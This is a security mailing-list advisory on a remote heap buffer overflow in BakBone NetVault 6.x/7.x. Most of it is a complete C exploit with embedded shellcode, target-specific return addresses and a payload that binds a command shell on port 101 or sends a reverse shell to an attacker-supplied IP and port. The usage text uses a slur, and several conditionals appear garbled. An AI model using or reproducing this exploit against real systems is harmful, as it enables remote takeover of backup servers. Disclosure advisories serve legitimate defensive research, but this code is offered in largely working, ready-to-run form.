[EXPL] BakBone NetVault Remote Heap Buffer Overflow (clientname)

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  BakBone NetVault Remote Heap Buffer Overflow (clientname)
------------------------------------------------------------------------


SUMMARY

 <http://www.bakbone.com/> NetVault is "a professional backup and restore 
solution for individual Windows and Linux servers and very small 
heterogeneous UNIX, Windows NT/2000, Linux and Netware environments".

By crafting a special packet, a NetVault user can trigger a heap based 
buffer overflow and run arbitrary code on the target machine.

DETAILS

Vulnerable Systems:
 * NetVault 7.x, 6.x

While having a look at the communication protocol used by the NetVault's 
client/server, the hat-squad has discovered several obscure points, as the 
possibility to guess the computername, to notice several bytes in the 
buffer referring to a string size stored in the heap. While playing with 
such data, a malicious user can add his own server entry to the "Available 
NetVault Machines" list nor at best for him, to override the heap where is 
stored the submitted "clientname" and to finally control two pointers in 
the heap management structure. Once freed or allocated; the heap is moving 
one pointer into the second and the second into the first.

77F37111 8901 MOV DWORD PTR DS:[ECX], EAX
77F37113 8948 04 MOV DWORD PTR DS:[EAX+4], ECX

Needless to say that owning both pointers, the attacker is able to 
overwrite any windows function marked as writable with any 32 bits value 
we want. To HeapAllocate at around 33000 bytes will produce an access 
violation.

Proof of Concept Code:
/*
for more informations class101.org/netv-remhbof.pdf
*/

#include <stdio.h>
#include <string.h>

#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>

#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>

#include <fcntl.h>
#endif

char scode1[]=
"\x33\xC9\x83\xE9"
"\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"

"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
"\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
"\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
"\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
"\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
"\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
"\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"

"\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
"\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
"\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
"\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
"\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
"\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
"\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
"\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02"
"\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";


char scode2[]=
/*original vlad902's reverse shellcode from metasploit.com
  NOT xored, modded by class101 for ca's xpl0it to remove the common 
badchar "\x20"
  original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
"\xFC\x6A\xEB\x52" /*modded adjusting jump*/
"\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x3C\x8B\x7C\x05"
"\x78\x01\xEF"

"\x83\xC7\x01" /*modded, adding 1 to edi*/
"\x8B\x4F\x17" /*modded, adjusting ecx*/
"\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/
"\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84\xC0"
"\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
"\x8B\x5F\x23" /*modded, adjusting ebx*/
"\x01\xEB\x66\x8B\x0C\x4B"
"\x8B\x5F\x1B" /*modded, adjusting ebx*/

"\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40"
"\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E"
"\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32"
"\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66"
"\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF"
"\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x00\x00\x00\x00"
"\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF"
"\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50"
"\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD"

"\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3"
"\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51"
"\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37"
"\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF"
"\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0";


char scodeA[] =
"\x11\x03\x00\x00\x01\xCB\x22\x77\xC9\x17\x00\x00\x00\x69\x3B\x69"
"\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69"

"\x3B\x73\x3B\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x0C\x58\x3C\x42"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00";

char scodeB[] =
"\x00\x51\x02\x00\x00\x00\x00\x00\x00\x01\x03\x05\x27\xCA\x07\x00"
"\x00\x00\x73\x3B\x62\x3B\x6F\x3B\x00";

char scodeC[] =
"\x00\x00\x02\x01\x00\x00\x00\x8F\xD0\xF0\xCA\x0B\x00\x00"

"\x00\x69\x3B\x62\x3B\x6F\x3B\x6F\x3B\x7A\x3B\x00\x11\x57\x3C\x42"
"\x00\x01\xB9\xF9\xA2\xC8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01"
"\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00"
"\x00\x10\x02\x4E\x3F\xAC\x14\xCC\x0A\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20"
"\x00\x00\x00\x10\x02\x4E\x3F\xC0\xA8\xEA\xEB\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x01\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B"

"\x00\x20\x00\x00\x00\x10\x02\x4E\x3F\xC2\x97\x2C\xD3\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\xB9\xF9\xA2\xC8\x02\x02\x00\x00\x00\xA5\x97"
"\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00\x00\x04"
"\x02\x4E\x3F\xAC\x14\xCC\x0A\xB0\xFC\xE2\x00\x00\x00\x00\x00\xEC"
"\xFA\x8E\x01\xA4\x6B\x41\x00\xE4\xFA\x8E\x01\xFF\xFF\xFF\xFF\x01"
"\x02\x00\x00\x00";

char scodeD[] =

"\x00\x06\x00\x00\x00\x0B\x00\x00\x00\x05\x00\x00\x00\x54"
"\x79\x70\x65\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00"
"\x77\x69\x6E\x6E\x74\x00\x12\x00\x00\x00\x55\x44\x50\x20\x46\x72"
"\x61\x67\x6D\x65\x6E\x74\x20\x53\x69\x7A\x65\x00\x01\x00\x00\x00"
"\x01\x00\x00\x00\x05\x00\x00\x00\x31\x34\x30\x30\x00\x07\x00\x00"
"\x00\x53\x65\x72\x76\x65\x72\x00\x01\x00\x00\x00\x01\x00\x00\x00"
"\x05\x00\x00\x00\x54\x52\x55\x45\x00\x0C\x00\x00\x00\x44\x65\x73"
"\x63\x72\x69\x70\x74\x69\x6F\x6E\x00\x00\x00\x00\x00\x01\x00\x00"
"\x00\x0A\x00\x00\x00\x4E\x56\x56\x65\x72\x73\x69\x6F\x6E\x00\x01"

"\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x37\x30\x33\x30\x00"
"\x0D\x00\x00\x00\x4E\x56\x42\x75\x69\x6C\x64\x4C\x65\x76\x65\x6C"
"\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x33\x37\x00";

char grabcpname[] =
"\xC9\x00\x00\x00\x01\xCB\x22\x77\xC9\x17\x00\x00\x00\x69\x3B\x69"
"\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69\x3B\x69"
"\x3B\x73\x3B\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00"

"\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x09\x00\x00\x00\x00\x00\x00\x00\x00";

char payload[1024], payload2[20000000], recvbuf[1024], ver2[1024], 
cpname[1024], sz[1024], szb[1024], szb2[1024];
int tot,tot2,l00p=0;

char sip[3], spo[1], pad[]="\xEB\x0A",pad2[]="\xE9\xF3\xFD\xFF\xFF";
char ret1[]="\x7E\x6D\x03\x75"; //call dword [esi+4C],  ws2_32.dll, w2k 
SP4 EN
char ret1c[]="\xBD\x9B\x36\x7C"; //call dword [edi+74],  MSVCR71.dll, XP 
SP1a-1-0 EN
char ret2[]="\xF0\xA1\x5C\x7C"; //UEF (UnHandledExceptionFilter) w2k sp4 
EN
char ret4[]="\xB4\x73\xED\x77"; //UEF XP SP1a-1-0 EN
char padA[]="\x00\x00\x00";

char szc[]="\xFF\xFF";

// rtlmethod char repair[]="\xC7\x40\x89\x60\x20\xF8\x77"; repairing 
RtlEnterCriticalSection on 2k SP4
//you will prolly need to repair this repair[] for your os :>
//I did it quickly: mov dword ptr [eax-77], 77F82060
//for litchfield this method is reliable due to the fixed address 
0x7FFDF020
//for me that's a crap method like others known heap exploitations
//because you realiably repair the functions across all nt based os?, and 
where to realiably jump...,
//and also the call to drwtsn32, right before ExitProcess(), acts as a 
breakpoint, and your shellcode will be executed

//once 'OK' or 'CANCEL' clicked. At least this is still a 'fun' 
ExitProcess() :)

#ifdef WIN32
 WSADATA wsadata;
#endif

void ver();
void usage(char* us);
void sl(int time);

int main(int argc,char *argv[])
{
 ver();
 int check1, check2, rc, i, j, k;
 unsigned long gip;
 unsigned short gport;

 char *what, *where, *os;
loop:
 if (argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]); 
return -1;}
 if (argc=5){usage(argv[0]); return -1;}
  if (strlen(argv[2])<7){usage(argv[0]); return -1;}

  if (argc=6)
 {
   if (strlen(argv[4])<7){usage(argv[0]); return -1;}
 }
#ifndef WIN32
 if (argc=6)

 {
   gip=inet_addr(argv[4])^(long)0x00000000;
  gport=htons(atoi(argv[5]))^(short)0x0000;
  memcpy(&sip[0],  &gip, 4); memcpy(&spo[0],  &gport, 2);
  check1=strlen(&sip[0]); check2=strlen(&spo[0]);

  if (check1 = 0||check1 = 1||check1 = 2||check1 = 3){
   printf("[+] error, the IP has a null byte in hex...\n"); return -1;}
  if (check2 != 2){printf("[+] error, the PORT has a null byte in 
hex...\n"); return -1;}
 }
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)

#else
 if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup 
error\n"); return -1;}
 if (argc=6)
 {
  gip=inet_addr(argv[4])^(ULONG)0x00000000;
  gport=htons(atoi(argv[5]))^(USHORT)0x0000;

  memcpy(&sip[0],  &gip, 4); memcpy(&spo[0],  &gport, 2);
  check1=strlen(&sip[0]); check2=strlen(&spo[0]);
  if (check1 = 0||check1 = 1||check1 = 2||check1 = 3){
   printf("[+] error, the IP has a null byte in hex...\n"); return -1;}

  if (check2 != 2){printf("[+] error, the PORT has a null byte in 
hex...\n"); return -1;}
 }
#endif
 int ip=htonl(inet_addr(argv[2])), port;
 if (argc=4||argc=6){port=atoi(argv[3]); } else port=20031;
 SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;

 s=socket(AF_INET,SOCK_STREAM,0);
 if (s=-1){printf("[+] socket() error\n"); return -1;}
if (atoi(argv[1]) = 1){what=ret1;where=ret2;os="Win2k SP4 Server
English\n[+] Win2k SP4 Pro English\n";}
if (atoi(argv[1]) = 2){what=ret1c;where=ret4;os="WinXP SP0 Pro.
English\n[+] WinXP SP1 Pro. English\n[+] WinXP SP1a Pro. English\n";}
  if (l00p=0){printf("[+] TARGET: %s\n",os); sl(1); }
 server.sin_family=AF_INET;
 server.sin_addr.s_addr=htonl(ip);

 server.sin_port=htons(port);
 connect(s,( struct sockaddr *)&server,sizeof(server));
 timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask); FD_SET(s,&mask);
 switch(select(s+1,NULL,&mask,NULL,&timeout))

 {
  case -1: {printf("[+] select() error\n"); closesocket(s); return -1;}
  case 0: {printf("[+] connect() error\n"); closesocket(s); return -1;}
  default:
  if(FD_ISSET(s,&mask))
  {

   if (l00p=0)
   {
    printf("[+] connection 1: grabbing computername via netvault...\n");
    sl(2);
    send(s,grabcpname,sizeof(grabcpname)-1,0);
    rc = recv(s,recvbuf,sizeof(recvbuf),0);

if
(rc=-1||rc<400||recvbuf[13]!=105&&recvbuf[14]!=59){printf("[+]
not netvault or patched, aborting..\n"); return -1;}
    else if (rc=0){printf("[+] nothing received, not netvault or patched, 
aborting..\n"); return -1;}
    else printf("[+] analyzing packets, sorting computername\n");
    sl(2);
    printf("[+] bufsize: %d\n",rc); sl(1);
    for (i=80,j=0;recvbuf[i]!=0;i++,j++)

    {
     memset(cpname+j,recvbuf[i], 1);
    }
    memset(sz,strlen(cpname)+1,1);
    memset(ver2,recvbuf[rc-37], 1); memset(ver2+1,0x2E,1);
    memset(ver2+2,recvbuf[rc-35], 1); memset(ver2+3,0x2E,1);

    memset(ver2+4,recvbuf[rc-34], 1);
    printf("[+] cmpname: %s\n",cpname); sl(1);
    printf("[+] version: %s\n",ver2); sl(1); l00p++;
    closesocket(s);
#ifdef WIN32
WSACleanup();
#endif

    goto loop;
   }
   printf("[+]\n[+] connection 2: modding payload regarding computername 
and length\n"); sl(1);
   printf("[+] loading attack\n"); sl(1);
/*the cpname length is important, that's why we reajust EAX and ECX
function of cpnamelength.*/
   k=7-strlen(cpname);

   memset(payload,0x41,1);
// rtlmethod memset(payload2,0x90,k+32417);  rtl
// rtlmethod memcpy(payload2+k+32417,"\x1C\xF0\xFD\x7F",4);
// rtlmethod memcpy(payload2+k+32421,"\x1A\x9E\xEA\x00",4);
// rtlmethod memcpy(payload2+k+31902, repair, 7);
   memset(payload2,0x90,k+35431);
memcpy(payload2+k+32413,pad,2); memcpy(payload2+k+32417,what,4); 
memcpy(payload2+k+32421,where,4); memcpy(payload2+k+32426,pad2,5);
   if (argc=6)

   {
    memcpy(&scode2[167],  &gip, 4);
    memcpy(&scode2[173],  &gport, 2);
    memcpy(payload2+k+31914,scode2,strlen(scode2));
   }

   else memcpy(payload2+k+31914,scode1,strlen(scode1));
tot=sizeof(padA)-1+ sizeof(scodeA)-1+ sizeof(scodeB)-1+ sizeof(scodeC)-1+ 
sizeof(scodeD)-1+strlen(payload)+strlen(payload2)+strlen(sz)+strlen(cpname);
   tot2=tot-192;
            memcpy(szb,&tot,2); memcpy(&scodeA[0], &szb,strlen(szb));
   memcpy(szb2,&tot2,2); memcpy(&scodeB[1], &szb2,strlen(szb2));

   memcpy(scodeC+254,szc,2);
   printf("[+] sh0uting the heap!\n"); sl(3);
   if (send(s,scodeA,sizeof(scodeA)-1,0)=-1) { printf("[+] sending error, 
the server prolly rebooted.\n"); return -1;}
   if (send(s,payload,strlen(payload),0)=-1) { printf("[+] sending error, 
the server prolly rebooted.\n"); return -1;}
   if (send(s,scodeB,sizeof(scodeB)-1,0)=-1) { printf("[+] sending error, 
the server prolly rebooted.\n"); return -1;}
   if (send(s,sz,strlen(sz),0)=-1) { printf("[+] sending error, the server 
prolly rebooted.\n"); return -1;}

   if (send(s,padA,sizeof(padA)-1,0)=-1) { printf("[+] sending error, the 
server prolly rebooted.\n"); return -1;}
   if (send(s,cpname,strlen(cpname),0)=-1) { printf("[+] sending error, 
the server prolly rebooted.\n"); return -1;}
   if (send(s,scodeC,sizeof(scodeC)-1,0)=-1) { printf("[+] sending error, 
the server prolly rebooted.\n"); return -1;}
   if (send(s,payload2,strlen(payload2),0)=-1) { printf("[+] sending 
error, the server prolly rebooted.\n"); return -1;}
   sl(6);
   printf("[+]\n[+] size of payload: %d\n",tot);

    if (argc=6){printf("[+] payload sent, look at your listener, you 
should get a shell\n"); }
    else printf("[+] payload sent, use telnet %s:101 to get a 
shell\n",inet_ntoa(server.sin_addr));
   return 0;
  }
 }
 closesocket(s);

#ifdef WIN32
 WSACleanup();
#endif
 return 0;
}


void usage(char* us)
{

  
printf(" \n");
printf("[+] . 101_netvault.exe Target VulnIP (bind mode) \n");
printf("[+] . 101_netvault.exe Target VulnIP VulnPORT (bind mode) \n");
printf("[+] . 101_netvault.exe Target VulnIP VulnPORT GayIP GayPORT 
reverse mode) \n");
printf("TARGETS: \n");
printf("[+] 1. Win2k SP4 Server English (*) - v5.0.2195 \n");
printf("[+] 1. Win2k SP4 Pro English (*) - v5.0.2195 \n");
printf("[+] 2. WinXP SP0 Pro. English - v5.1.2600 \n");

printf("[+] 2. WinXP SP1 Pro. English (*) - v5.1.2600 \n");
printf("[+] 2. WinXP SP1a Pro. English (*) - v5.1.2600 \n");
printf("NOTE: \n");
printf("The exploit bind a cmdshell port 101 or \n");
printf("reverse a cmdshell on your listener. \n");
printf("A wildcard (*) mean tested working, else, supposed working. \n");
printf("A symbol (-) mean all. \n");
printf(" Compilation msvc6, cygwin, Linux. \n");
printf(" \n");

return;
}

void ver()
{
printf(" \n");
printf("==============[v0.1]==\n");
printf("===BakBone NetVault, Backup Server========\n");
printf("===Clientname, Remote Heap Overflow Exploit=====\n");

printf("==coded by class101===[Hat-Squad.com 2005]===\n");
printf("======================\n");
printf(" \n");
}

void sl(int time)
{
#ifdef WIN32
   Sleep(time*1000);

#else
   Sleep(time);
#endif
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:ad@class101.org> class.
The original article can be found at:  
<http://www.class101.org/netv-remhbof.pdfo> 
http://www.class101.org/netv-remhbof.pdfo



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.